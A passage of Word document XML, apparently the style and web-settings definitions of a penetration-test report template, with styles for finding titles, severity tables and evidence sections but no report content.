    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE6B03"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FA3B59"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
      </w:tabs>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:noProof/>
      <w:color w:val="A4B1CD"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00520B63"/>
    <w:pPr>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00520B6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20B63"/>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520B63"/>
    <w:pPr>
      <w:ind w:left="660"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00520B63"/>
    <w:pPr>
      <w:ind w:left="880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00520B63"/>
    <w:pPr>
      <w:ind w:left="1100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00520B63"/>
    <w:pPr>
      <w:ind w:left="1320"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00520B63"/>
    <w:pPr>
      <w:ind w:left="1540"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00520B63"/>
    <w:pPr>
      <w:ind w:left="1760"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="LowSeverityDifficult">
    <w:name w:val="Low Severity / Difficult"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="0036389D"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="0070C0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:rsid w:val="007D1F5C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D1F5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1D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DF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1DF1"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Calibri" w:hAnsi="Consolas" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C32C65"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00CA09DC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA09DC"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA09DC"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CA09D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A09DC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00CA09DC"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>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CoverHeading">
    <w:name w:val="Cover Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CoverHeadingChar"/>
    <w:qFormat/>
    <w:rsid w:val="009F119A"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CoverSubtitle">
    <w:name w:val="Cover Subtitle"/>
    <w:basedOn w:val="CoverHeading"/>
    <w:link w:val="CoverSubtitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="00525CDA"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
      <w:color w:val="9FEF00"/>
      <w:sz w:val="52"/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CoverHeadingChar">
    <w:name w:val="Cover Heading Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CoverHeading"/>
    <w:rsid w:val="009F119A"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CoverDate">
    <w:name w:val="Cover Date"/>
    <w:basedOn w:val="CoverSubtitle"/>
    <w:link w:val="CoverDateChar"/>
    <w:qFormat/>
    <w:rsid w:val="00525CDA"/>
    <w:rPr>
      <w:bCs/>
      <w:color w:val="A4B1CD"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CoverSubtitleChar">
    <w:name w:val="Cover Subtitle Char"/>
    <w:basedOn w:val="TitleChar"/>
    <w:link w:val="CoverSubtitle"/>
    <w:rsid w:val="00525CDA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
      <w:color w:val="9FEF00"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="56"/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CoverVersion">
    <w:name w:val="Cover Version"/>
    <w:basedOn w:val="CoverDate"/>
    <w:link w:val="CoverVersionChar"/>
    <w:qFormat/>
    <w:rsid w:val="00E5694A"/>
    <w:rPr>
      <w:i/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CoverDateChar">
    <w:name w:val="Cover Date Char"/>
    <w:basedOn w:val="CoverSubtitleChar"/>
    <w:link w:val="CoverDate"/>
    <w:rsid w:val="00525CDA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
      <w:bCs/>
      <w:color w:val="A4B1CD"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FooterText">
    <w:name w:val="Footer Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterTextChar"/>
    <w:qFormat/>
    <w:rsid w:val="00E5694A"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="A4B1CD"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CoverVersionChar">
    <w:name w:val="Cover Version Char"/>
    <w:basedOn w:val="CoverDateChar"/>
    <w:link w:val="CoverVersion"/>
    <w:rsid w:val="00E5694A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
      <w:bCs/>
      <w:i/>
      <w:color w:val="A4B1CD"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HTBheading3">
    <w:name w:val="HTB heading 3"/>
    <w:basedOn w:val="HTBheading2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="HTBheading3Char"/>
    <w:qFormat/>
    <w:rsid w:val="004C55CB"/>
    <w:pPr>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="7FBF00"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterTextChar">
    <w:name w:val="Footer Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FooterText"/>
    <w:rsid w:val="00E5694A"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="A4B1CD"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGridLight">
    <w:name w:val="Grid Table Light"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="40"/>
    <w:rsid w:val="002163A5"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
      <w:sz w:val="20"/>
    </w:rPr>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="115" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="115" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:trPr>
      <w:cantSplit/>
    </w:trPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:vAlign w:val="center"/>
    </w:tcPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTBheading3Char">
    <w:name w:val="HTB heading 3 Char"/>
    <w:basedOn w:val="HTBheading2Char"/>
    <w:link w:val="HTBheading3"/>
    <w:rsid w:val="004C55CB"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="7FBF00"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ImageFormat">
    <w:name w:val="Image Format"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="ImageFormatChar"/>
    <w:qFormat/>
    <w:rsid w:val="00CA74E4"/>
    <w:pPr>
      <w:keepNext/>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FindingTitle">
    <w:name w:val="Finding Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FindingTitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="00465543"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="20"/>
      </w:numPr>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="28"/>
      <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ImageFormatChar">
    <w:name w:val="Image Format Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="ImageFormat"/>
    <w:rsid w:val="00CA74E4"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="PlainTable1">
    <w:name w:val="Plain Table 1"/>
    <w:aliases w:val="High Finding"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="41"/>
    <w:rsid w:val="002B240C"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>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FF3E3E"/>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FF3E3E"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FindingTitleChar">
    <w:name w:val="Finding Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FindingTitle"/>
    <w:rsid w:val="00465543"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EvidencePreamble">
    <w:name w:val="Evidence Preamble"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EvidencePreambleChar"/>
    <w:qFormat/>
    <w:rsid w:val="005246AF"/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="MediumFinding">
    <w:name w:val="Medium Finding"/>
    <w:basedOn w:val="PlainTable1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F93B55"/>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ED7D31"/>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ED7D31"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EvidencePreambleChar">
    <w:name w:val="Evidence Preamble Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="EvidencePreamble"/>
    <w:rsid w:val="005246AF"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="LowFinding">
    <w:name w:val="Low Finding"/>
    <w:basedOn w:val="PlainTable1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00375482"/>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6600"/>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6600"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style1"/>
    <w:basedOn w:val="PlainTable1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00934A22"/>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00FF"/>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00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3825">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="109133558">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="157767070">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="239825986">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="426926137">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="561643544">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="799223204">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="806776272">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1093550406">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1141311024">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1065420255">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="117143961">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="531766233">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1482652688">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="792869226">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="576406399">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1866167425">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="520243657">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1309944153">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
